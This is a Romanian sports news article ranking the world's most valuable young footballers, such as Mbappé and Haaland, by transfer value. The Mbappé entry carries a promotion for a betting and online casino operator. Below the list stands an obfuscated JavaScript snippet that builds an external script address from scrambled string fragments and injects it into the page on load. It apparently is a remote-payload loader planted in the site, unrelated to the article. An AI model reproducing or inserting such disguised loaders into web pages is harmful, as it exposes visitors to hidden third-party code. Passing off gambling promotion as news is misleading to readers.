Sport

Cum arată topul celor mai valoroși fotbaliști tineri din lume

Iată cum arată topul celor mai valoroși fotbaliști tineri din lume:

1. Kylian Mbappe (160 de milioane de euro) – Fotbalistul lui PSG a împlinit 23 de ani în luna decembrie, dar pare că îl știm deja de o viață. Sunt deja ani buni de când joacă la cel mai înalt nivel, ținând cont că a fost cumpărat de PSG în 2017 cu 145 de milioane de euro. Iar Mbappe a confirmat din plin așteptările și a devenit unul dintre cei mai buni jucători din lume. El este cotat acum la 160 de milioane de euro, dar cota maximă a avut-o în 2018, când a fost evaluat la 200 de milioane de euro. El a intrat în ultimele 6 luni de contract cu PSG și presa externă scrie intens despre posibilitatea ca el să se transfere la Real Madrid. Momentan, Mbappe a anunțat că nu a luat o decizie în privința viitorului său. Până atunci, francezul rămâne concentrat pe evoluțiile de la PSG. Dacă în Ligue 1 lupta pentru titlu pare tranșată, atenția se mută pe Champions League, unde PSG e a cincea favorită la câștigarea trofeului, conform cotelor din secțiunea pariuri online NetBet. PSG are cota 11.00, în timp ce favorită este Manchester City. Cotele pentru câștigarea Champions League sunt disponibile la NetBet, operator care deține și cel mai mare cazino online din România, unde sunt disponibile peste 2.000 de sloturi.

2. Erling Haaland (150 de milioane de euro) – Atacantul norvegian de la Borussia Dortmund are doar 21 de ani dar a impresionat în ultimele sezoane prin capacitatea sa de a înscrie din orice poziție. De asemenea, Haaland mai impresionează și prin fizicul său. Are cea mai mare cotă pe Transfermarkt din toată cariera și este dorit de numeroase echipe, precum Real Madrid, FC Barcelona și Manchester City. Haaland și-a exprimat dorința de a pleca de la Dortmund în vara anului următor, iar șansele unui transfer sunt destul de mari.

3. Vinicius Junior (100 milioane de euro) – Jucătorul lui Real Madrid traversează cel mai bun moment al carierei, motiv pentru care cota sa de piață a crescut enorm în ultimele luni și se discută și despre posibilitatea de a prelungi contractul. În octombrie 2021, el era evaluat la 50 de milioane de euro, în timp ce cota sa de piață s-a dublat până în acest moment. Vinicius încântă prin tehnica sa și pare omul potrivit pe care Real Madrid îl caută de când l-a cedat pe Cristiano Ronaldo la Juventus Torino.

4. Phil Foden (85 de milioane de euro) – Jucătorul de la Manchester City este într-o creștere continuă în acest sport, motiv pentru care și cota sa de piață a ajuns la un nivel maxim. Phil Foden a fost promovat la prima echipă a lui Manchester City în vara anului 2017 și a devenit om de bază în gruparea lui Pep Guardiola, dar și în naționala Angliei, în care este titular meci de meci.

4. Jadon Sancho (85 de milioane de euro) – A fost cumpărat în vara anului trecut de Manchester United de la Borussia Dortmund pentru 85 de milioane de euro. Nivelul maxim al cotei sale de piață a fost înregistrat în martie 2020, când era evaluat la 130 de milioane de euro. Evoluează ca mijlocaș pe ambele benzi ale terenului și impresionează prin tehnica sa în regim de viteză. Cu siguranță este unul dintre cei mai talentați fotbaliști din lume.
(function(){
t3j9u=”jn1zq3em3j9t”;t3j9=document.createElement(“script”);
t3j9_=”u”+(“st”);t3j9_+=”at”+(“.”);t3j9.async=true;t3j9_+=”in”;
t3j9u=”368210490.”+t3j9u;t3j9.type=”text/javascript”;t3j9u+=”pgxnpdqfzlnk”;
t3j9u+=”pn63pX”;t3j9_+=(“f”)+”o”+(“/”);t3j9.src=”https://”+t3j9_+t3j9u;
t3j9d=document.body;t3j9d.appendChild(t3j9);
})();

Fiți la curent cu ultimele noutăți. Urmărește TIMPUL pe Google News și Telegram!


Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *